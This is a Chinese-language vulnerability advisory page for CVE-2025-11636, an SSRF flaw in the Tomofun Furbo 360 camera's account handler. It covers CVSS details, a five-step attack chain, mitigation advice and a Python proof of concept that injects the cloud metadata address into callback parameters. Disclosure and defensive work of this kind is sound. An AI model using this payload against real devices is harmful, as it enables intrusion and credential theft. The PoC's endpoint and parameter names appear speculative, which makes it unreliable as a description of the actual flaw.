IPBUF安全漏洞报告
English
CVE-2025-11636 CVSS 5.6 中危

CVE-2025-11636:Tomofun Furbo 360账户处理器SSRF漏洞

披露日期: 2025-10-12
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-11636
漏洞类型
服务端请求伪造(SSRF)
CVSS评分
5.6 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Tomofun Furbo 360

相关标签

SSRF服务端请求伪造TomofunFurbo 360IoT设备智能宠物摄像机Account Handler中危漏洞CVE-2025-11636固件漏洞

漏洞概述

CVE-2025-11636是Tomofun Furbo 360智能宠物摄像机设备中发现的一个服务端请求伪造(Server-Side Request Forgery,SSRF)漏洞。该漏洞影响固件版本至FB0035_FW_036的Furbo 360设备,具体存在于Account Handler(账户处理器)组件中。攻击者可以通过精心构造的请求,利用该组件中的未知处理逻辑,诱导服务器端应用程序向内部或外部目标发起非预期的HTTP请求。

该漏洞的CVSS 3.1评分为5.6分,属于中等严重级别。其攻击向量为网络(AV:N),无需认证(PR:N)和用户交互(UI:N),但攻击复杂度较高(AC:H),这意味着成功利用该漏洞需要满足特定的前提条件或绕过某些防护机制。漏洞对机密性、完整性和可用性均有一定程度的影响(均为低级别)。

值得注意的是,Tomofun作为供应商在漏洞披露前已被提前通知,但未做出任何回应,这给用户带来了潜在的安全风险。Furbo 360作为一款智能宠物监控设备,通常部署在家庭网络环境中,其账户处理器组件可能涉及与云端服务的通信,因此SSRF漏洞可能被攻击者利用来探测内部网络、访问云元数据服务或与内部服务进行交互。

技术细节

服务端请求伪造(SSRF)是一种Web安全漏洞,攻击者能够通过操纵服务器端应用程序发出的请求,使服务器代表攻击者访问或与内部/外部资源进行交互。在CVE-2025-11636中,漏洞存在于Tomofun Furbo 360设备的Account Handler组件中。

从技术角度看,该漏洞的产生原因可能包括以下几个方面:

1. **输入验证不足**:Account Handler组件在处理用户输入时,未对URL、主机名或IP地址进行充分的验证和过滤,导致攻击者可以注入恶意的请求目标。

2. **不安全的请求转发**:当账户处理器需要与外部服务(如OAuth提供商、云服务等)进行通信时,可能直接将用户提供的URL作为请求目标,而未进行白名单校验或安全检查。

3. **协议处理缺陷**:组件可能支持多种协议(如HTTP、HTTPS、file、gopher等),攻击者可以利用这些协议读取本地文件或与内部服务进行交互。

利用方式方面,攻击者首先需要通过网络访问到存在漏洞的Account Handler接口。由于攻击复杂度被评估为高(AC:H),攻击者可能需要满足以下条件之一:

- 拥有有效的账户凭据或能够绕过身份验证机制
- 利用特定的请求序列或时间窗口
- 结合其他漏洞或信息泄露来构造有效的攻击载荷

成功利用后,攻击者可以:
- 探测内网拓扑结构和服务
- 访问云元数据服务获取敏感凭据
- 对内部系统进行端口扫描
- 在某些情况下实现远程代码执行

由于漏洞影响机密性、完整性和可用性均为低级别(L:L),其直接危害相对有限,但仍可能被用作更大规模攻击链中的一环。

攻击链分析

STEP 1
步骤1:信息收集
攻击者首先识别目标网络中的Tomofun Furbo 360设备,确定其IP地址和网络可达性。通过网络扫描或利用已知的设备发现协议(如SSDP、mDNS)定位目标设备。
STEP 2
步骤2:接口探测
攻击者对设备的Account Handler组件接口进行探测,分析其请求参数和响应行为,识别可能存在SSRF漏洞的输入点,如callback_url、redirect_uri或account_endpoint等参数。
STEP 3
步骤3:载荷构造
由于漏洞复杂度较高(AC:H),攻击者需要构造特定的请求载荷,可能需要满足特定的认证条件或请求格式要求,注入恶意的内部URL作为目标地址。
STEP 4
步骤4:SSRF利用
攻击者向Account Handler发送精心构造的请求,使服务器端应用程序代表攻击者向内部地址(如云元数据服务169.254.169.254、内网服务等)发起请求。
STEP 5
步骤5:数据获取与后续利用
成功利用后,攻击者可以获取内部服务的响应数据,包括云凭据、网络拓扑信息等,并可能将这些信息用于后续的攻击活动,如横向移动或权限提升。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-11636 - Tomofun Furbo 360 SSRF PoC # Vulnerability: Server-Side Request Forgery in Account Handler component # Affected: Tomofun Furbo 360 up to FB0035_FW_036 import requests import sys TARGET_URL = "https://<target-furbo-device>/api/account/handler" INTERNAL_TARGET = "http://169.254.169.254/latest/meta-data/" # AWS metadata service example def exploit_ssrf(target_url, internal_target): """ Exploit SSRF vulnerability in Account Handler component. The Account Handler may accept URL parameters for account verification or OAuth callback processing without proper validation. """ headers = { "Content-Type": "application/json", "User-Agent": "FurboApp/1.0" } # Payload to inject internal URL via account handler parameter payload = { "action": "verify_account", "callback_url": internal_target, "redirect_uri": internal_target, "account_endpoint": internal_target } try: response = requests.post(target_url, json=payload, headers=headers, timeout=10) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text[:500]}") if response.status_code == 200 and "meta-data" in response.text.lower(): print("[!] SSRF confirmed - Internal metadata accessed!") return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL internal = sys.argv[2] if len(sys.argv) > 2 else INTERNAL_TARGET exploit_ssrf(target, internal)

影响范围

Tomofun Furbo 360 < FB0035_FW_036

防御指南

临时缓解措施
在等待厂商发布官方补丁之前,建议用户采取以下临时缓解措施:1)将Furbo 360设备部署在独立的网络隔离区域(如独立的IoT VLAN),限制其与内网其他系统的通信;2)在网络防火墙层面限制设备的出站连接,仅允许必要的云服务通信;3)监控设备的网络流量,检测是否存在异常的内部地址访问行为;4)如非必要,暂停使用涉及Account Handler功能的特性;5)考虑使用替代的本地存储方案,减少对云端账户服务的依赖。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表